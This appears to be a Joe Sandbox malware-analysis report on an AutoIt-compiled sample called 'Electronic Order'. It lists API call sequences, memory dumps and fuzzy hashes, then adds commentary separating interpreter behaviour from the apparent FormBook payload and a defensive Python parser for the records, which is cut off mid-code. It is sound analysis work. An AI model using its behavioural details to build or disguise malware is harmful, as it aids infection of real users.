                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LongNamePath_memmove
                                      • String ID:
                                      • API String ID: 2514874351-0
                                      • Opcode ID: 74ab72cf2ec1a13c1e8b31833368c476f305a7454f538f346875c57872802406
                                      • Instruction ID: dd9ebd084718fb662ef4a6e56d5a6d8a088bcbac30d898cb991557a4360d5111
                                      • Opcode Fuzzy Hash: 74ab72cf2ec1a13c1e8b31833368c476f305a7454f538f346875c57872802406
                                      • Instruction Fuzzy Hash: C5E0CD3690522C9BC721D658DC05FFA77EDDF89790F0541B5FD0CD7214D9A19C8186B0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID:
                                      • API String ID: 2638373210-0
                                      • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                      • Instruction ID: 586c39da62b2c0387e6b18487addebd118fe28c379042e06353e3b03c1099267
                                      • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                      • Instruction Fuzzy Hash: C1E092B0104B405FD7388A24E8507E373E0EB06319F00181CF29A93342EB6278418759
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00DFE16B,?,?,00000000), ref: 00DC5DBF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: a6a0fef9ece3320c4e95a6b9458631d9e0986f92d296a497ab8e54fd533c2909
                                      • Instruction ID: fc807aefe2b91234c38e5ddf3f2112cf3309371845bf9a5015353d348b62805a
                                      • Opcode Fuzzy Hash: a6a0fef9ece3320c4e95a6b9458631d9e0986f92d296a497ab8e54fd533c2909
                                      • Instruction Fuzzy Hash: 7DD0C77464020CBFE710DB81DC46FA9777CD705710F100294FD0466390D6B27D548795
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __wfsopen
                                      • String ID:
                                      • API String ID: 197181222-0
                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                      • Instruction ID: 1b2c04682042eaf6eb34b74b96f949375ec9850667421284890d764d1b135b52
                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                      • Instruction Fuzzy Hash: 17B0927684060C77DE022E82FC02A593B199B406B8F808020FB0C181A2A673A6A096A9
                                      APIs
                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00E2D46A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID:
                                      • API String ID: 1452528299-0
                                      • Opcode ID: cc09d2c978768210049404e3b01f351f5649b38f6e5eea1ce2633af4bc68bacc
                                      • Instruction ID: dec377a830005e41ef2bf02323c598c00b678a81bb7042c7c58645bdedf3f4de
                                      • Opcode Fuzzy Hash: cc09d2c978768210049404e3b01f351f5649b38f6e5eea1ce2633af4bc68bacc
                                      • Instruction Fuzzy Hash: E47150302083128FC714EF65E891F6AB7E0EF88314F04556DF5969B2A1DF70E949CB62
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: 4e5adbd2006c076c631ae867d72e4931e154699c38564a13ffe6b3daf7612e00
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: D1311670A00145DFC718EF5AD480969FBB6FF59700B688AA5E449CB651D7B0EDC1CBE0
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 015822B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction ID: 9c22fc1a09af6936f7e0f7ac5acda46efe83842e9eb4f7e84cb963f39e9a0885
                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction Fuzzy Hash: 12E09A7494010EAFDB00EFA4D54969E7BB4EF04311F1005A1FD05A6681DA309A548A62
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 015822B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 929309ab14552ea07737995a51c48bc1ddfd74d1e012c43cb6bb000bd85dbfed
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: DEE0BF7494010E9FDB00EFA4D54969E7FB4EF04301F100161FD05A2281D63099508A62
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E4CE50
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E4CE91
                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E4CED6
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E4CF00
                                      • SendMessageW.USER32 ref: 00E4CF29
                                      • _wcsncpy.LIBCMT ref: 00E4CFA1
                                      • GetKeyState.USER32(00000011), ref: 00E4CFC2
                                      • GetKeyState.USER32(00000009), ref: 00E4CFCF
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E4CFE5
                                      • GetKeyState.USER32(00000010), ref: 00E4CFEF
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E4D018
                                      • SendMessageW.USER32 ref: 00E4D03F
                                      • SendMessageW.USER32(?,00001030,?,00E4B602), ref: 00E4D145
                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E4D15B
                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E4D16E
                                      • SetCapture.USER32(?), ref: 00E4D177
                                      • ClientToScreen.USER32(?,?), ref: 00E4D1DC
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E4D1E9
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E4D203
                                      • ReleaseCapture.USER32 ref: 00E4D20E
                                      • GetCursorPos.USER32(?), ref: 00E4D248
                                      • ScreenToClient.USER32(?,?), ref: 00E4D255
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E4D2B1
                                      • SendMessageW.USER32 ref: 00E4D2DF
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E4D31C
                                      • SendMessageW.USER32 ref: 00E4D34B
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E4D36C
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E4D37B
                                      • GetCursorPos.USER32(?), ref: 00E4D39B
                                      • ScreenToClient.USER32(?,?), ref: 00E4D3A8
                                      • GetParent.USER32(?), ref: 00E4D3C8
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E4D431
                                      • SendMessageW.USER32 ref: 00E4D462
                                      • ClientToScreen.USER32(?,?), ref: 00E4D4C0
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E4D4F0
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E4D51A
                                      • SendMessageW.USER32 ref: 00E4D53D
                                      • ClientToScreen.USER32(?,?), ref: 00E4D58F
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E4D5C3
                                        • Part of subcall function 00DC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DC25EC
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E4D65F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                      • String ID: @GUI_DRAGID$F$pr
                                      • API String ID: 3977979337-1436871235
                                      • Opcode ID: 97945179a7a051d9bb96cdfbb38a78b00313f6e0932770a7e51a434385c0bb98
                                      • Instruction ID: a1b1ae5ddc2275e83ea6110b8ed23fe77b408f9cd0de697da789e67117d102a6
                                      • Opcode Fuzzy Hash: 97945179a7a051d9bb96cdfbb38a78b00313f6e0932770a7e51a434385c0bb98
                                      • Instruction Fuzzy Hash: 2342FD34609341AFC725CF29E844FAABBE5FF49718F24051DF699A72A0C731D845CBA2
                                      APIs
                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00E4873F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 3850602802-328681919
                                      • Opcode ID: a5a0d6568f71815e4349b1eac5d3a96696cd5c97512b8475bcea1b45d978b1da
                                      • Instruction ID: 5adf82282d8b3954da609c70835b12a89e77b83094f28edc60952e443743d492
                                      • Opcode Fuzzy Hash: a5a0d6568f71815e4349b1eac5d3a96696cd5c97512b8475bcea1b45d978b1da
                                      • Instruction Fuzzy Hash: 68120270500204AFEB259F25ED49FAE7BB8EF49B14F20516AF915FA2E1DF708941CB60
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove$_memset
                                      • String ID: 0w$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                      • API String ID: 1357608183-3460961967
                                      • Opcode ID: ea0269753b9baa3eeff57dec6aaddfed6584659252ab7dd7c0c62d02d6c5bc93
                                      • Instruction ID: 290e9796d0142d6e5a4516d2bce2c7739880484adf718c5827cd9904f2933ad4
                                      • Opcode Fuzzy Hash: ea0269753b9baa3eeff57dec6aaddfed6584659252ab7dd7c0c62d02d6c5bc93
                                      • Instruction Fuzzy Hash: 9D938E71A002199BDB24CFA8D881BEDB7B1FF48714F25916AE955BB380E7709EC1CB50
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,?), ref: 00DC4A3D
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DFDA8E
                                      • IsIconic.USER32(?), ref: 00DFDA97
                                      • ShowWindow.USER32(?,00000009), ref: 00DFDAA4
                                      • SetForegroundWindow.USER32(?), ref: 00DFDAAE
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DFDAC4
                                      • GetCurrentThreadId.KERNEL32 ref: 00DFDACB
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DFDAD7
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DFDAE8
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DFDAF0
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00DFDAF8
                                      • SetForegroundWindow.USER32(?), ref: 00DFDAFB
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DFDB10
                                      • keybd_event.USER32(00000012,00000000), ref: 00DFDB1B
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DFDB25
                                      • keybd_event.USER32(00000012,00000000), ref: 00DFDB2A
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DFDB33
                                      • keybd_event.USER32(00000012,00000000), ref: 00DFDB38
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DFDB42
                                      • keybd_event.USER32(00000012,00000000), ref: 00DFDB47
                                      • SetForegroundWindow.USER32(?), ref: 00DFDB4A
                                      • AttachThreadInput.USER32(?,?,00000000), ref: 00DFDB71
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      • Opcode ID: ccca4398a9d9f8e856582aeb1522fb9e3c53ebcd54809693a9e2b066606677af
                                      • Instruction ID: bc02e1ab9ed3616fab7b0471ada40cc3bdc27f7b54ef3f952f0752bde2e98744
                                      • Opcode Fuzzy Hash: ccca4398a9d9f8e856582aeb1522fb9e3c53ebcd54809693a9e2b066606677af
                                      • Instruction Fuzzy Hash: 31316275A4031CBEEB216F629C49F7F3E6DEB45F50F168065FA04FA1D0C6B09D01AAA0
                                      APIs
                                        • Part of subcall function 00E18CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E18D0D
                                        • Part of subcall function 00E18CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E18D3A
                                        • Part of subcall function 00E18CC3: GetLastError.KERNEL32 ref: 00E18D47
                                      • _memset.LIBCMT ref: 00E1889B
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E188ED
                                      • CloseHandle.KERNEL32(?), ref: 00E188FE
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E18915
                                      • GetProcessWindowStation.USER32 ref: 00E1892E
                                      • SetProcessWindowStation.USER32(00000000), ref: 00E18938
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E18952
                                        • Part of subcall function 00E18713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E18851), ref: 00E18728
                                        • Part of subcall function 00E18713: CloseHandle.KERNEL32(?,?,00E18851), ref: 00E1873A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                      • String ID: $default$winsta0
                                      • API String ID: 2063423040-1027155976
                                      • Opcode ID: 23ca0e957c416c9b1f0ee41117ddc82b24d2ba5cb87ef9e25d33954ab734a003
                                      • Instruction ID: 7ed37b9439a9fde8481acaae40666174bca1e8c39f7b80832d9a8be2cc6606e1
                                      • Opcode Fuzzy Hash: 23ca0e957c416c9b1f0ee41117ddc82b24d2ba5cb87ef9e25d33954ab734a003
                                      • Instruction Fuzzy Hash: 3F817975900209AFDF11DFA1DE45AEEBBB8FF05709F08516AF820B2161DB318E95DB60
                                      APIs
                                      • OpenClipboard.USER32(00E4F910), ref: 00E34284
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E34292
                                      • GetClipboardData.USER32(0000000D), ref: 00E3429A
                                      • CloseClipboard.USER32 ref: 00E342A6
                                      • GlobalLock.KERNEL32(00000000), ref: 00E342C2
                                      • CloseClipboard.USER32 ref: 00E342CC
                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00E342E1
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00E342EE
                                      • GetClipboardData.USER32(00000001), ref: 00E342F6
                                      • GlobalLock.KERNEL32(00000000), ref: 00E34303
                                      • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00E34337
                                      • CloseClipboard.USER32 ref: 00E34447
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                      • String ID:
                                      • API String ID: 3222323430-0
                                      • Opcode ID: aec910df08d69e30429ebb8a92907e732319ac1503b388da41c7da8a3fd11fc8
                                      • Instruction ID: ee6fe760edb2c845940dce2c713d596f6961a4f7bd15c57c78b7a3be2d4124d1
                                      • Opcode Fuzzy Hash: aec910df08d69e30429ebb8a92907e732319ac1503b388da41c7da8a3fd11fc8
                                      • Instruction Fuzzy Hash: 2C517E75204206AFD311AB61EC99F6F7BA8AF85B00F014529F556F31F1DF70A909CB62
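The records above are the Joe Sandbox IDA plugin's per-function summaries: the API calls a function makes (with each call site's address), the memory dump the function was decompiled from, and the opcode and instruction fuzzy hashes used for similarity matching. Two points matter when reading them for this sample. First, the report flags the binary as a compiled AutoIt script, and the API sequences listed here are consistent with well-known parts of the AutoIt runtime rather than with the FormBook payload itself: OpenClipboard followed by IsClipboardFormatAvailable and GetClipboardData for formats 0x0D (CF_UNICODETEXT) and 0x01 (CF_TEXT) is the shape of ClipGet; FindWindowW("Shell_TrayWnd"), AttachThreadInput and keybd_event with virtual key 0x12 (VK_MENU, a simulated Alt press) is the shape of WinActivate's foreground-window workaround; DuplicateTokenEx followed by OpenWindowStationW("winsta0") and OpenDesktopW("default") is the shape of RunAs; and the @GUI_DRAGID string belongs to the AutoIt GUI code. Such records explain why the generic "clipboard" and "block input" signatures fire, but they are not evidence of payload behaviour on their own. Second, the functions that cannot be attributed to the interpreter are the ones decompiled from the dump marked "based on PE: false" (the region at 0x01580000 holding the Sleep wrappers), so that is the dump to extract and examine first. The parser below is an added example, not part of the report or of Joe Sandbox's tooling: it turns records in this layout into structured objects and picks out those unbacked-region records. The regexes are written against the line format visible on this page rather than a documented schema, the class and function names are mine, and the sample input is copied (abridged) from two of the records above.

```python
"""Parser for Joe Sandbox IDA-plugin function records (the APIs / Memory Dump
Source / Similarity blocks).  Added example, not Joe Sandbox code: the regexes
follow the record layout as it appears in this report, not a published schema."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function XXXX:".
API_RE = re.compile(
    r"^[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?(?P<name>[A-Za-z_]\w*)"
    r"\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^[•*-]\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")  # "• Key: value"
SOURCE_RE = re.compile(r"^(?P<file>\S+\.sdmp), Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                    # call-site address
    subcall_of: Optional[int]   # address of the sub-function when the call is inside one

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    api_groups: List[str] = field(default_factory=list)   # "API ID", split on '$'
    strings: List[str] = field(default_factory=list)      # "String ID", split on '$'
    associated: List[str] = field(default_factory=list)   # other dumps of the same module
    base: Optional[int] = None                            # dump base address
    pe_backed: Optional[bool] = None                      # "based on PE" flag
    fields: Dict[str, str] = field(default_factory=dict)  # Opcode ID, fuzzy hashes, ...

    def calls(self, name: str) -> List[ApiCall]:
        return [c for c in self.apis if c.name == name]

def parse_records(text: str) -> List[FunctionRecord]:
    """Each record starts at an 'APIs' line; everything up to the next one belongs to it."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
        elif cur is None:
            continue                          # text before the first record
        elif (m := API_RE.match(line)):
            cur.apis.append(ApiCall(m["name"], m["module"],
                                    m["args"].split(",") if m["args"] else [],
                                    int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
        elif (m := KV_RE.match(line)):
            key, val = m["key"], m["val"].strip()
            if key == "Source File" and (s := SOURCE_RE.match(val)):
                cur.base, cur.pe_backed = int(s["base"], 16), s["pe"] == "true"
                cur.fields[key] = s["file"]
            elif key == "API ID":
                cur.api_groups = [x for x in val.split("$") if x]
            elif key == "String ID":
                cur.strings = [x for x in val.split("$") if x]
            elif key == "Associated":         # drop the page's "Download File" link text
                cur.associated.append(val.split("Download File")[0].strip())
            else:
                cur.fields[key] = val
    return records

def unbacked_code(records: List[FunctionRecord]) -> List[FunctionRecord]:
    """Records decompiled from dumps the plugin could not map to a PE image
    ("based on PE: false"); after injection or unpacking these are the regions
    to extract first, since nothing on disk accounts for their code."""
    return [r for r in records if r.pe_backed is False]

# Sample input copied (abridged) from two of this report's records: the Sleep
# wrapper in the unbacked region at 0x01580000 and the clipboard reader in the
# main image at 0x00DC0000.
SAMPLE = """
APIs
• Sleep.KERNELBASE(000001F4), ref: 015822B1
Memory Dump Source
• Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
Similarity
• API ID: Sleep
• Instruction Fuzzy Hash: 12E09A7494010EAFDB00EFA4D54969E7BB4EF04311F1005A1FD05A6681DA309A548A62
APIs
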